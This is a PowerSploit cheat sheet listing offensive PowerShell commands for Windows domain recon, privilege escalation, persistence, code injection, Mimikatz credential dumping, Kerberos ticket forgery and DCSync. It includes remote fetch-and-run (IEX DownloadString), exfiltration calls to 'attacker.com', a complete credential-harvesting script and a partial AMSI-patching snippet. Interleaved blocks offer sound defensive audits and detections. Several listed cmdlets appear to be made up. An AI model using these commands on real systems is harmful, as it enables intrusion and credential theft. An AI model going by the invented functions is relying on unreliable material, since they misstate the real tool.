
PowerSploit Cheat Sheet

Overview

PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit consists of the following modules: CodeExecution, ScriptModification, Persistence, AntivirusBypass, Exfiltration, Mayhem, Privesc, and Recon. Each module contains several functions that provide various capabilities for post-exploitation activities.

⚠️ Warning: Only use PowerSploit in environments you own or have explicit permission to test. Unauthorized use may violate terms of service or local laws.

Installation

Download from GitHub

# Download PowerSploit
Invoke-WebRequest -Uri "https://github.com/PowerShellMafia/PowerSploit/archive/master.zip" -OutFile "PowerSploit.zip"

# Extract archive
Expand-Archive -Path "PowerSploit.zip" -DestinationPath "C:\Tools\"

# Navigate to PowerSploit directory
cd C:\Tools\PowerSploit-master\

Git Clone

# Clone repository
git clone https://github.com/PowerShellMafia/PowerSploit.git

# Navigate to directory
cd PowerSploit

Import Modules

# Import all modules
Import-Module .\PowerSploit.psd1

# Import specific modules
Import-Module .\Recon\Recon.psd1
Import-Module .\Privesc\PowerUp.ps1
Import-Module .\Exfiltration\Exfiltration.psd1
Import-Module .\Persistence\Persistence.psd1

# Import from URL (in-memory)
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1')

Bypass Execution Policy

# Bypass execution policy for the current user (use -Scope Process to limit it to the current session)
Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope CurrentUser

# Run with bypass
powershell -ExecutionPolicy Bypass -File script.ps1

# Import with bypass
powershell -ExecutionPolicy Bypass -Command "Import-Module .\PowerSploit.psd1"

Recon Module

PowerView Functions

# Import PowerView
Import-Module .\Recon\PowerView.ps1

# Get domain information
Get-Domain
Get-DomainController
Get-DomainPolicy

# Get forest information
Get-Forest
Get-ForestDomain
Get-ForestGlobalCatalog

# Domain trust enumeration
Get-DomainTrust
Get-ForestTrust
Get-DomainTrustMapping

# User enumeration
Get-DomainUser
Get-DomainUser -Identity administrator
Get-DomainUser -LDAPFilter "(&(objectCategory=person)(objectClass=user))"
Get-DomainUser -Properties samaccountname,description

# Group enumeration
Get-DomainGroup
Get-DomainGroup -Identity "Domain Admins"
Get-DomainGroupMember -Identity "Domain Admins"
Get-DomainGroup -AdminCount

# Computer enumeration
Get-DomainComputer
Get-DomainComputer -OperatingSystem "*Server*"
Get-DomainComputer -Ping
Get-DomainComputer -Properties name,operatingsystem,serviceprincipalname

Advanced PowerView Queries

# Find users with SPN (Kerberoastable)
Get-DomainUser -SPN

# Find computers with unconstrained delegation
Get-DomainComputer -UnconstrainedDelegation

# Find users with constrained delegation
Get-DomainUser -TrustedToAuth

# Find ASREPRoastable users
Get-DomainUser -PreauthNotRequired

# Find users with the PASSWD_NOTREQD flag (password not required)
Get-DomainUser -UACFilter PASSWD_NOTREQD

# Find users with passwords that don't expire
Get-DomainUser -UACFilter DONT_EXPIRE_PASSWORD

# Find privileged users
Get-DomainUser -AdminCount
Get-DomainGroupMember -Identity "Enterprise Admins" -Recurse

# Find shares
Find-DomainShare
Find-DomainShare -CheckShareAccess

# Find interesting files
Find-InterestingDomainShareFile
Find-InterestingDomainShareFile -Include *.doc,*.docx,*.xls,*.xlsx,*.ppt,*.pptx

Session and Local Admin Enumeration

# Find local admin access
Find-LocalAdminAccess
Find-LocalAdminAccess -ComputerName "target-computer"

# Find where domain admins are logged in
Find-DomainUserLocation
Find-DomainUserLocation -UserIdentity "administrator"

# Get logged-on users
Get-NetLoggedon -ComputerName "target-computer"
Get-NetSession -ComputerName "target-computer"

# Get local groups
Get-NetLocalGroup -ComputerName "target-computer"
Get-NetLocalGroupMember -ComputerName "target-computer" -GroupName "Administrators"

# Process enumeration
Get-NetProcess -ComputerName "target-computer"

ACL and Permissions

# Get ACLs for objects
Get-ObjectAcl -Identity "Domain Admins"
Get-ObjectAcl -Identity "administrator" -ResolveGUIDs

# Find interesting ACLs
Find-InterestingDomainAcl
Find-InterestingDomainAcl -ResolveGUIDs

# Get path ACLs
Get-PathAcl -Path "\\server\share"

# Add ACL
Add-ObjectAcl -TargetIdentity "target-user" -PrincipalIdentity "attacker-user" -Rights DCSync

Privesc Module (PowerUp)

Basic Privilege Escalation

# Import PowerUp
Import-Module .\Privesc\PowerUp.ps1

# Run all privilege escalation checks
Invoke-AllChecks

# Run specific checks
Invoke-ServiceAbuse
Invoke-PrivescAudit

# Check for unquoted service paths
Get-ServiceUnquoted

# Check for modifiable services
Get-ModifiableService

# Check for modifiable service binaries
Get-ModifiableServiceFile

# Check for AlwaysInstallElevated
Get-RegistryAlwaysInstallElevated

# Check for autologon credentials
Get-RegistryAutoLogon

# Check for modifiable scheduled tasks
Get-ModifiableScheduledTaskFile

Service Exploitation

# Abuse unquoted service paths
Write-ServiceBinary -Name "VulnService" -Path "C:\Program Files\Vuln Service\service.exe"

# Abuse modifiable services
Invoke-ServiceAbuse -Name "VulnService" -Command "net user backdoor Password123 /add"

# Install service
Install-ServiceBinary -Name "BackdoorService" -Path "C:\Windows\Temp\backdoor.exe"

# Restore service
Restore-ServiceBinary -Name "VulnService"

DLL Hijacking

# Find DLL hijacking opportunities
Find-ProcessDLLHijack
Find-PathDLLHijack

# Write hijack DLL
Write-HijackDll -DllPath "C:\Windows\System32\wlbsctrl.dll" -Command "net user backdoor Password123 /add"

Registry Exploitation

# Recover IIS application pool and virtual directory credentials from applicationHost.config
Get-ApplicationHost

# Check for modifiable registry autoruns
Get-ModifiableRegistryAutoRun

# Check for unattended install files
Get-UnattendedInstallFile

# Check for web.config files containing credentials
Get-WebConfig

# Check for cached Group Policy Preferences passwords
Get-CachedGPPPassword

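The PowerUp checks above enumerate misconfigurations an attacker can abuse; the same conditions are what an administrator should audit and fix. The following is an added example, not part of the original cheat sheet or of PowerSploit: it finds services whose unquoted ImagePath contains a space (the condition behind Get-ServiceUnquoted), quotes the path in the registry when run elevated, and reports whether AlwaysInstallElevated is set in both policy hives. The function names Get-UnquotedServicePath, Repair-UnquotedServicePath and Test-AlwaysInstallElevated are this example's own.

```powershell
# Added example (not from PowerSploit): defensive audit and remediation of the conditions
# PowerUp's Get-ServiceUnquoted and Get-RegistryAlwaysInstallElevated look for.

function Get-UnquotedServicePath {
    # Returns services whose executable path is unquoted and contains a space. The service
    # control manager tries each prefix ending at a space ("C:\Program.exe", then
    # "C:\Program Files\Vuln.exe", ...), so a writable parent directory lets a low-privileged
    # user plant a binary that runs under the service account.
    Get-CimInstance -ClassName Win32_Service | ForEach-Object {
        $path = $_.PathName
        # Only unquoted paths matter; split into the executable and its arguments (first ".exe").
        if ($path -and $path -notmatch '^\s*"' -and $path -match '^(?<exe>.*?\.exe)(?<rest>.*)$') {
            $exe  = $Matches['exe']
            $rest = $Matches['rest'].Trim()
            if ($exe -match '\s') {
                [pscustomobject]@{
                    Name       = $_.Name
                    StartName  = $_.StartName      # account the service runs as
                    Executable = $exe
                    Arguments  = $rest
                    PathName   = $path
                }
            }
        }
    }
}

function Repair-UnquotedServicePath {
    # Quotes the executable portion of an unquoted ImagePath. Requires administrator rights.
    # Supports -WhatIf so the change can be previewed before it is written.
    [CmdletBinding(SupportsShouldProcess = $true)]
    param(
        [Parameter(Mandatory, ValueFromPipelineByPropertyName)] [string]$Name,
        [Parameter(Mandatory, ValueFromPipelineByPropertyName)] [string]$Executable,
        [Parameter(ValueFromPipelineByPropertyName)] [string]$Arguments = ''
    )
    process {
        $regPath  = "HKLM:\SYSTEM\CurrentControlSet\Services\$Name"
        $newValue = '"{0}"' -f $Executable
        if ($Arguments) { $newValue += " $Arguments" }
        if ($PSCmdlet.ShouldProcess($Name, "set ImagePath to $newValue")) {
            # ImagePath is REG_EXPAND_SZ; keep that type when rewriting it.
            Set-ItemProperty -Path $regPath -Name ImagePath -Value $newValue -Type ExpandString
        }
    }
}

function Test-AlwaysInstallElevated {
    # AlwaysInstallElevated is only abusable when BOTH the machine and the user policy value are 1.
    $keys = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer',
            'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
    $values = foreach ($k in $keys) {
        $v = Get-ItemProperty -Path $k -Name AlwaysInstallElevated -ErrorAction SilentlyContinue
        [bool]($v.AlwaysInstallElevated -eq 1)   # missing value counts as "not configured" (off)
    }
    [pscustomobject]@{
        MachinePolicy = $values[0]
        UserPolicy    = $values[1]
        Vulnerable    = $values[0] -and $values[1]
        Remediation   = 'Disable "Always install with elevated privileges" under Windows Installer in both Computer and User Configuration via Group Policy'
    }
}

# Usage (run elevated for the repair):
#   Get-UnquotedServicePath | Format-Table Name, StartName, Executable
#   Get-UnquotedServicePath | Repair-UnquotedServicePath -WhatIf
#   Test-AlwaysInstallElevated
```

The repair only quotes the path; it does not change the directory permissions that make the weakness exploitable, so also review write access on the parent directories Get-UnquotedServicePath reports.
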
Persistence Module

Registry Persistence

# Import Persistence module
Import-Module .\Persistence\Persistence.psd1

# Add registry persistence
Add-Persistence -Method Registry -Key "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" -Value "backdoor" -PayloadPath "C:\Windows\Temp\backdoor.exe"

# Add WMI persistence
Add-Persistence -Method WMI -EventName "ProcessStart" -PayloadPath "C:\Windows\Temp\backdoor.exe"

# Add scheduled task persistence
Add-Persistence -Method ScheduledTask -TaskName "SystemUpdate" -PayloadPath "C:\Windows\Temp\backdoor.exe" -Trigger "Daily"

WMI Persistence

# Install WMI backdoor
Install-WMIBackdoor -PayloadPath "C:\Windows\Temp\backdoor.exe"

# Get WMI backdoor
Get-WMIBackdoor

# Remove WMI backdoor
Remove-WMIBackdoor

User Hunting

# Add user hunter
Add-UserHunter -UserName "administrator" -PayloadPath "C:\Windows\Temp\backdoor.exe"

# Get user hunter
Get-UserHunter

# Remove user hunter
Remove-UserHunter

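Every persistence method listed above leaves an artifact in a well-known location: a Run key value, a permanent WMI event subscription in root\subscription, or a scheduled task. The following is an added example, not part of the original cheat sheet or of PowerSploit, that enumerates all three from a defender's side and flags entries that run from temp or profile directories or use encoded PowerShell. Function names Get-RunKeyEntry, Get-WmiSubscription, Get-TaskAction and Find-SuspiciousAutostart, and the suspicious-command pattern, are this example's own assumptions.

```powershell
# Added example (not from PowerSploit): hunt the autostart locations that the Persistence
# module targets and flag the ones that look like the commands in this cheat sheet.

function Get-RunKeyEntry {
    # Autostart values under the classic Run/RunOnce keys for the machine and the current user.
    $keys = @(
        'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
        'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',
        'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run',
        'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
        'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce'
    )
    foreach ($key in $keys) {
        $item = Get-ItemProperty -Path $key -ErrorAction SilentlyContinue
        if (-not $item) { continue }
        foreach ($prop in $item.PSObject.Properties) {
            if ($prop.Name -like 'PS*') { continue }   # skip PSPath, PSParentPath, ... metadata
            [pscustomobject]@{ Source = 'RunKey'; Location = $key; Name = $prop.Name; Command = [string]$prop.Value }
        }
    }
}

function Get-WmiSubscription {
    # Permanent WMI subscriptions live in root\subscription: a consumer (the action) is bound to
    # a filter (the trigger, e.g. a process start). On a workstation any entry here deserves a look.
    $ns = 'root\subscription'
    $consumers = @(Get-CimInstance -Namespace $ns -ClassName CommandLineEventConsumer -ErrorAction SilentlyContinue) +
                 @(Get-CimInstance -Namespace $ns -ClassName ActiveScriptEventConsumer -ErrorAction SilentlyContinue)
    foreach ($c in $consumers) {
        [pscustomobject]@{
            Source   = 'WMI'
            Location = "$ns\$($c.CimClass.CimClassName)"
            Name     = $c.Name
            Command  = if ($c.CommandLineTemplate) { $c.CommandLineTemplate } else { [string]$c.ScriptText }
        }
    }
    foreach ($b in Get-CimInstance -Namespace $ns -ClassName __FilterToConsumerBinding -ErrorAction SilentlyContinue) {
        [pscustomobject]@{ Source = 'WMI'; Location = "$ns\__FilterToConsumerBinding"; Name = [string]$b.Filter; Command = [string]$b.Consumer }
    }
}

function Get-TaskAction {
    # Scheduled tasks outside Microsoft's own folders, with the command each action executes.
    Get-ScheduledTask | Where-Object { $_.TaskPath -notlike '\Microsoft\*' } | ForEach-Object {
        $task = $_
        foreach ($a in $task.Actions) {
            if ($a.Execute) {
                [pscustomobject]@{
                    Source   = 'ScheduledTask'
                    Location = $task.TaskPath
                    Name     = $task.TaskName
                    Command  = ("$($a.Execute) $($a.Arguments)").Trim()
                }
            }
        }
    }
}

function Find-SuspiciousAutostart {
    # Combine the three sources and flag commands that run from temp/profile paths or pass an
    # encoded command to PowerShell. Flagged entries are for review, not automatic removal.
    $pattern = '\\Windows\\Temp\\|\\AppData\\|\\Users\\Public\\|powershell[^|]*\s-(enc|ec|e)\s'
    @(Get-RunKeyEntry) + @(Get-WmiSubscription) + @(Get-TaskAction) | ForEach-Object {
        $_ | Add-Member -NotePropertyName Suspicious -NotePropertyValue ([bool]($_.Command -match $pattern)) -PassThru
    }
}

# Usage:
#   Find-SuspiciousAutostart | Where-Object Suspicious | Format-Table Source, Name, Command -Wrap
```

Reading root\subscription and HKLM needs local administrator rights; run the hunt under an admin account or it will silently return only the current user's entries.
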
CodeExecution Module

DLL Injection

# Import CodeExecution module
Import-Module .\CodeExecution\CodeExecution.psd1

# Invoke DLL injection
Invoke-DllInjection -ProcessID 1234 -Dll "C:\Windows\Temp\payload.dll"

# Invoke reflective PE injection
Invoke-ReflectivePEInjection -PEPath "C:\Windows\Temp\payload.exe" -ProcId 1234

# Invoke shellcode injection
Invoke-Shellcode -Shellcode $shellcode -ProcessID 1234

Memory Execution

# Execute PE in memory
Invoke-ReflectivePEInjection -PEBytes $PEBytes

# Execute shellcode
$shellcode = @(0xfc,0x48,0x83,0xe4,0xf0,0xe8...)
Invoke-Shellcode -Shellcode $shellcode

# Invoke Mimikatz in memory
Invoke-Mimikatz
Invoke-Mimikatz -Command "sekurlsa::logonpasswords"

Exfiltration Module

Data Exfiltration

# Import Exfiltration module
Import-Module .\Exfiltration\Exfiltration.psd1

# Exfiltrate via DNS
Invoke-DNSExfiltration -Data "sensitive data" -Domain "attacker.com"

# Exfiltrate via ICMP
Invoke-ICMPExfiltration -Data "sensitive data" -Target "attacker-ip"

# Exfiltrate via HTTP
Invoke-HTTPExfiltration -Data "sensitive data" -URL "http://attacker.com/upload"

# Get clipboard contents
Get-ClipboardContents

# Log keystrokes
Get-Keystrokes -LogPath "C:\Windows\Temp\keylog.txt"

# Take screenshots
Get-TimedScreenshot -Path "C:\Windows\Temp\screenshots" -Interval 30

Credential Harvesting

# Get stored credentials
Get-VaultCredential
Get-LSASecret

# Dump SAM database
Get-SAMHashes

# Get cached RDP connection history
Get-CachedRDPConnection

# Invoke credential prompt
Invoke-CredentialInjection

AntivirusBypass Module

AV Evasion

# Import AntivirusBypass module
Import-Module .\AntivirusBypass\AntivirusBypass.psd1

# Locate the byte ranges in a file that trigger an AV signature
Find-AVSignature

# Disable Windows Defender
Disable-WindowsDefender

# Bypass AMSI
Invoke-AMSIBypass

# Obfuscate script
Out-ObfuscatedAst -ScriptPath "script.ps1"

ScriptModification Module

Script Obfuscation

# Import ScriptModification module
Import-Module .\ScriptModification\ScriptModification.psd1

# Compress and base64-encode a script block into a one-line command
Out-EncodedCommand -ScriptBlock {Get-Process}

# Compress and encode script
Out-CompressedDll -ScriptPath "script.ps1"

# Minify script
Out-MinimizedScript -ScriptPath "script.ps1"

Mayhem Module

System Disruption

# Import Mayhem module
Import-Module .\Mayhem\Mayhem.psd1

# Set wallpaper
Set-Wallpaper -ImagePath "C:\Windows\Temp\image.jpg"

# Set critical process
Set-CriticalProcess -ProcessName "notepad"

# Add machine account to domain
Add-MachineAccountQuota -MachineAccount "FAKE01" -Password "Password123"

Advanced Techniques

Kerberoasting

# Find Kerberoastable users
Get-DomainUser -SPN | Select-Object samaccountname,serviceprincipalname

# Request service tickets
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "HTTP/web.domain.com"

# Export tickets for cracking
Invoke-Mimikatz -Command "kerberos::list /export"

ASREPRoasting

# Find ASREPRoastable users
Get-DomainUser -PreauthNotRequired|Select-Object samaccountname

# Request AS-REP for user without pre-auth
Get-ASREPHash -UserName "vulnerable-user" -Domain "domain.com"

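Both Kerberoasting and AS-REP roasting work because of account settings a domain administrator controls: a service principal name on a user account with a weak or old password, or the "Do not require Kerberos preauthentication" flag. The following is an added example, not part of the original cheat sheet or of PowerSploit, that audits a domain for both conditions and reports a remediation per account. It assumes the RSAT ActiveDirectory module; the function name Get-KerberosRoastingExposure and the 365-day password-age threshold are this example's own.

```powershell
# Added example (not from PowerSploit): audit the account conditions behind Kerberoasting and
# AS-REP roasting. Requires the RSAT ActiveDirectory module and read access to the domain.
Import-Module ActiveDirectory

function Get-KerberosRoastingExposure {
    param(
        [string]$Server,                 # optional domain controller to query
        [int]$MaxPasswordAgeDays = 365   # assumed threshold; tune to your policy
    )
    $adArgs = @{ Properties = 'servicePrincipalName', 'PasswordLastSet', 'AdminCount', 'userAccountControl', 'msDS-SupportedEncryptionTypes' }
    if ($Server) { $adArgs.Server = $Server }
    $now = Get-Date

    # (A) Any user account with an SPN: every authenticated user can request a service ticket
    #     encrypted with that account's password hash and crack it offline. krbtgt is excluded.
    $spnUsers  = Get-ADUser -LDAPFilter '(&(servicePrincipalName=*)(!(sAMAccountName=krbtgt)))' @adArgs
    # (B) DONT_REQ_PREAUTH (userAccountControl bit 0x400000 = 4194304): the KDC returns an AS-REP
    #     to anyone who asks, which can likewise be cracked offline.
    $noPreauth = Get-ADUser -LDAPFilter '(userAccountControl:1.2.840.113556.1.4.803:=4194304)' @adArgs

    $sets = @(
        @{ Users = $spnUsers;  Issue = 'Kerberoastable (SPN set)' },
        @{ Users = $noPreauth; Issue = 'AS-REP roastable (preauth not required)' }
    )
    foreach ($set in $sets) {
        foreach ($u in $set.Users) {
            # msDS-SupportedEncryptionTypes bits: 0x4 = RC4-HMAC, 0x8 = AES128, 0x10 = AES256.
            # Without an AES bit the KDC issues RC4 tickets, which crack far faster than AES.
            $enc = [int]$u.'msDS-SupportedEncryptionTypes'
            $aes = ($enc -band 0x18) -ne 0
            $age = if ($u.PasswordLastSet) { [int]($now - $u.PasswordLastSet).TotalDays } else { $null }
            $fix = @()
            if ($set.Issue -like 'AS-REP*')                         { $fix += 'Clear "Do not require Kerberos preauthentication"' }
            if (-not $aes)                                          { $fix += 'Enable AES (msDS-SupportedEncryptionTypes = 24)' }
            if ($null -eq $age -or $age -gt $MaxPasswordAgeDays)    { $fix += 'Rotate the password or move the service to a gMSA' }
            if ($u.AdminCount)                                      { $fix += 'Privileged account: remove the SPN or the privilege' }
            [pscustomobject]@{
                SamAccountName  = $u.SamAccountName
                Issue           = $set.Issue
                Enabled         = $u.Enabled
                Privileged      = [bool]$u.AdminCount
                AESEnabled      = $aes
                PasswordAgeDays = $age
                Remediation     = ($fix -join '; ')
            }
        }
    }
}

# Usage:
#   Get-KerberosRoastingExposure | Sort-Object Privileged -Descending | Format-Table -AutoSize
```

Group managed service accounts (gMSA) remove the Kerberoasting problem at its root: their 240-character passwords rotate automatically, so a captured ticket is not worth cracking.
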
Golden Ticket Attack

# Get domain SID
Get-DomainSID

# Create golden ticket (requires krbtgt hash)
Invoke-Mimikatz -Command "kerberos::golden /user:administrator /domain:domain.com /sid:S-1-5-21-... /krbtgt:hash /ticket:golden.kirbi"

# Import golden ticket
Invoke-Mimikatz -Command "kerberos::ptt golden.kirbi"

Silver Ticket Attack

# Create silver ticket (requires servicio account hash)
Invoke-Mimikatz -Command "kerberos::golden /user:administrator /domain:domain.com /sid:S-1-5-21-... /target:server.domain.com /service:cifs /rc4:hash /ticket:silver.kirbi"

# Import silver ticket
Invoke-Mimikatz -Command "kerberos::ptt silver.kirbi"

DCSync Attack

# Perform DCSync (requires replication rights)
Invoke-Mimikatz -Command "lsadump::dcsync /domain:domain.com /user:krbtgt"
Invoke-Mimikatz -Command "lsadump::dcsync /domain:domain.com /user:administrator"

# DCSync all users
Invoke-Mimikatz -Command "lsadump::dcsync /domain:domain.com /all"

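Kerberoasting and DCSync both leave a footprint in a domain controller's Security log: a burst of event 4769 service-ticket requests with RC4 encryption (0x17) from one user, and event 4662 entries whose Properties field names a replication control-access right from an account that is not a domain controller. The following is an added example, not part of the original cheat sheet or of PowerSploit, that searches for both. It assumes "Audit Kerberos Service Ticket Operations" and "Audit Directory Service Access" are enabled and that the log is readable (run on the DC or pass -ComputerName); the function names and the thresholds are this example's own.

```powershell
# Added example (not from PowerSploit): detect Kerberoasting (4769, RC4) and DCSync (4662,
# replication rights) in a domain controller's Security log.

function ConvertTo-EventDataMap {
    # Turn the <EventData> of a Security event into a hashtable keyed by field name.
    param([Parameter(Mandatory)] [System.Diagnostics.Eventing.Reader.EventRecord]$Event)
    $xml = [xml]$Event.ToXml()
    $map = @{}
    foreach ($d in $xml.Event.EventData.Data) { $map[$d.Name] = $d.'#text' }
    $map
}

function Find-Rc4ServiceTicketRequest {
    # A successful 4769 with TicketEncryptionType 0x17 (RC4-HMAC) for a user service account is
    # the Kerberoasting footprint; current clients request AES (0x12) for AES-capable accounts.
    param([int]$Hours = 24, [string]$ComputerName)
    $getArgs = @{ FilterHashtable = @{ LogName = 'Security'; Id = 4769; StartTime = (Get-Date).AddHours(-$Hours) }
                  ErrorAction = 'SilentlyContinue' }
    if ($ComputerName) { $getArgs.ComputerName = $ComputerName }
    Get-WinEvent @getArgs | ForEach-Object {
        $d = ConvertTo-EventDataMap $_
        if ($d.TicketEncryptionType -eq '0x17' -and $d.Status -eq '0x0' -and
            $d.ServiceName -notlike '*$' -and $d.ServiceName -ne 'krbtgt') {
            [pscustomobject]@{
                Time        = $_.TimeCreated
                Requester   = $d.TargetUserName   # user who asked for the ticket
                ClientIP    = $d.IpAddress
                ServiceName = $d.ServiceName      # account whose ticket could be cracked
            }
        }
    }
}

function Group-Rc4Requester {
    # One requester collecting RC4 tickets for several distinct services is the strongest signal.
    param([int]$Hours = 24, [int]$MinServices = 3, [string]$ComputerName)
    Find-Rc4ServiceTicketRequest -Hours $Hours -ComputerName $ComputerName | Group-Object Requester |
        Where-Object { @($_.Group.ServiceName | Sort-Object -Unique).Count -ge $MinServices } |
        Select-Object @{ n = 'Requester'; e = { $_.Name } },
                      @{ n = 'Services';  e = { ($_.Group.ServiceName | Sort-Object -Unique) -join ',' } }
}

# Control-access rights that allow directory replication (the rights DCSync needs).
$ReplicationRightGuids = @{
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes'
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All'
    '89e95b76-444d-4c62-991a-0facbeda640c' = 'DS-Replication-Get-Changes-In-Filtered-Set'
}

function Find-ReplicationAccess {
    # 4662 events whose Properties list a replication right. Domain controllers (names ending in $)
    # do this legitimately, as do directory-sync service accounts you have explicitly approved.
    param([int]$Hours = 24, [string]$ComputerName)
    $getArgs = @{ FilterHashtable = @{ LogName = 'Security'; Id = 4662; StartTime = (Get-Date).AddHours(-$Hours) }
                  ErrorAction = 'SilentlyContinue' }
    if ($ComputerName) { $getArgs.ComputerName = $ComputerName }
    Get-WinEvent @getArgs | ForEach-Object {
        $d = ConvertTo-EventDataMap $_
        $rights = @($ReplicationRightGuids.Keys | Where-Object { $d.Properties -match $_ })
        if ($rights.Count -gt 0) {
            [pscustomobject]@{
                Time        = $_.TimeCreated
                Subject     = "$($d.SubjectDomainName)\$($d.SubjectUserName)"
                Rights      = ($rights | ForEach-Object { $ReplicationRightGuids[$_] }) -join ','
                Object      = $d.ObjectName
                IsDCAccount = $d.SubjectUserName -like '*$'
            }
        }
    }
}

# Usage:
#   Group-Rc4Requester -Hours 6
#   Find-ReplicationAccess | Where-Object { -not $_.IsDCAccount } | Format-Table -AutoSize
```

Treat a non-DC subject in Find-ReplicationAccess as an incident unless it is a known synchronisation account, and check the same account against the ACL findings from Find-InterestingDomainAcl to see how it obtained the right.
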
Automation Scripts

Domain Enumeration Script

#!/usr/bin/env powershell
# PowerSploit Domain Enumeration Script

param(
    [string]$Domain = $env:USERDNSDOMAIN,
    [string]$OutputDir = "C:\temp\enum"
)

# Create output directory
if (!(Test-Path $OutputDir)) {
    New-Item -ItemType Directory -Path $OutputDir -Force | Out-Null
}

# Import PowerView
Import-Module .\Recon\PowerView.ps1

Write-Host "[+] Starting domain enumeration for: $Domain"

try {
    # Domain information
    Write-Host "[+] Collecting domain information..."
    Get-Domain -Domain $Domain | Out-File "$OutputDir\domain_info.txt"
    Get-DomainController -Domain $Domain | Out-File "$OutputDir\domain_controllers.txt"
    Get-DomainPolicy -Domain $Domain | Out-File "$OutputDir\domain_policy.txt"

    # Users
    Write-Host "[+] Enumerating users..."
    Get-DomainUser -Domain $Domain | Out-File "$OutputDir\users.txt"
    Get-DomainUser -Domain $Domain -AdminCount | Out-File "$OutputDir\privileged_users.txt"
    Get-DomainUser -Domain $Domain -SPN | Out-File "$OutputDir\kerberoastable_users.txt"
    Get-DomainUser -Domain $Domain -PreauthNotRequired | Out-File "$OutputDir\asreproastable_users.txt"

    # Groups
    Write-Host "[+] Enumerating groups..."
    Get-DomainGroup -Domain $Domain | Out-File "$OutputDir\groups.txt"
    Get-DomainGroupMember -Identity "Domain Admins" -Domain $Domain | Out-File "$OutputDir\domain_admins.txt"
    Get-DomainGroupMember -Identity "Enterprise Admins" -Domain $Domain | Out-File "$OutputDir\enterprise_admins.txt"

    # Computers
    Write-Host "[+] Enumerating computers..."
    Get-DomainComputer -Domain $Domain | Out-File "$OutputDir\computers.txt"
    Get-DomainComputer -Domain $Domain -UnconstrainedDelegation | Out-File "$OutputDir\unconstrained_delegation.txt"

    # Trusts
    Write-Host "[+] Enumerating trusts..."
    Get-DomainTrust -Domain $Domain | Out-File "$OutputDir\domain_trusts.txt"
    Get-ForestTrust | Out-File "$OutputDir\forest_trusts.txt"

    # Shares
    Write-Host "[+] Finding shares..."
    Find-DomainShare -Domain $Domain | Out-File "$OutputDir\shares.txt"

    Write-Host "[+] Enumeration completed. Results saved to: $OutputDir"

} catch {
    Write-Error "[-] Enumeration failed: $($_.Exception.Message)"
}

Privilege Escalation Check Script

#!/usr/bin/env powershell
# PowerSploit Privilege Escalation Check

param(
    [string]$OutputFile = "C:\temp\privesc_results.txt"
)

# Import PowerUp
Import-Module .\Privesc\PowerUp.ps1

Write-Host "[+] Starting privilege escalation checks..."

try {
    # Run all checks and save to file
    Invoke-AllChecks | Tee-Object -FilePath $OutputFile

    Write-Host "[+] Privilege escalation checks completed"
    Write-Host "[+] Results saved to: $OutputFile"

    # Check for immediate wins
    $results = Get-Content $OutputFile

    if ($results -match "Unquoted Service Path") {
        Write-Host "[!] FOUND: Unquoted service paths - potential privilege escalation!"
    }

    if ($results -match "Modifiable Service") {
        Write-Host "[!] FOUND: Modifiable services - potential privilege escalation!"
    }

    if ($results -match "AlwaysInstallElevated") {
        Write-Host "[!] FOUND: AlwaysInstallElevated enabled - potential privilege escalation!"
    }

} catch {
    Write-Error "[-] Privilege escalation checks failed: $($_.Exception.Message)"
}

Credential Harvesting Script

#!/usr/bin/env powershell
# PowerSploit Credential Harvesting Script

param(
    [string]$OutputDir = "C:\temp\creds"
)

# Create output directory
if (!(Test-Path $OutputDir)) {
    New-Item -ItemType Directory -Path $OutputDir -Force | Out-Null
}

# Import modules
Import-Module .\Exfiltration\Exfiltration.psd1
Import-Module .\CodeExecution\CodeExecution.psd1

Write-Host "[+] Starting credential harvesting..."

try {
    # Mimikatz - dump credentials
    Write-Host "[+] Running Mimikatz..."
    Invoke-Mimikatz -Command "sekurlsa::logonpasswords" | Out-File "$OutputDir\logonpasswords.txt"
    Invoke-Mimikatz -Command "sekurlsa::wdigest" | Out-File "$OutputDir\wdigest.txt"
    Invoke-Mimikatz -Command "sekurlsa::kerberos" | Out-File "$OutputDir\kerberos.txt"
    Invoke-Mimikatz -Command "sekurlsa::tspkg" | Out-File "$OutputDir\tspkg.txt"

    # Registry secrets
    Write-Host "[+] Extracting registry secrets..."
    Get-LSASecret | Out-File "$OutputDir\lsa_secrets.txt"
    Get-CachedGPPPassword | Out-File "$OutputDir\gpp_passwords.txt"

    # Vault credentials
    Write-Host "[+] Extracting vault credentials..."
    Get-VaultCredential | Out-File "$OutputDir\vault_creds.txt"

    # Browser credentials
    Write-Host "[+] Extracting browser credentials..."
    Get-ChromeDump | Out-File "$OutputDir\chrome_creds.txt"
    Get-FirefoxDump | Out-File "$OutputDir\firefox_creds.txt"

    Write-Host "[+] Credential harvesting completed"
    Write-Host "[+] Results saved to: $OutputDir"

} catch {
    Write-Error "[-] Credential harvesting failed: $($_.Exception.Message)"
}

Evasion Techniques

AMSI Bypass

# Method 1: Reflection
$a = [Ref].Assembly.GetTypes()
$a | ForEach-Object {$_.GetMethods() | ForEach-Object {if($_.Name -like "*AmsiInitialize*") {$_.Invoke($null, @($null, 0))}}}

# Method 2: Memory patching
$Win32 = @"
using System;
using System.Runtime.InteropServices;
public class Win32 {
    [DllImport("kernel32")]
    public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
    [DllImport("kernel32")]
    public static extern IntPtr LoadLibrary(string name);
    [DllImport("kernel32")]
    public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
}
"@

Add-Type $Win32
$LoadLibrary = [Win32]::LoadLibrary("amsi.dll")
$Address = [Win32]::GetProcAddress($LoadLibrary, "AmsiScanBuffer")
$p = 0
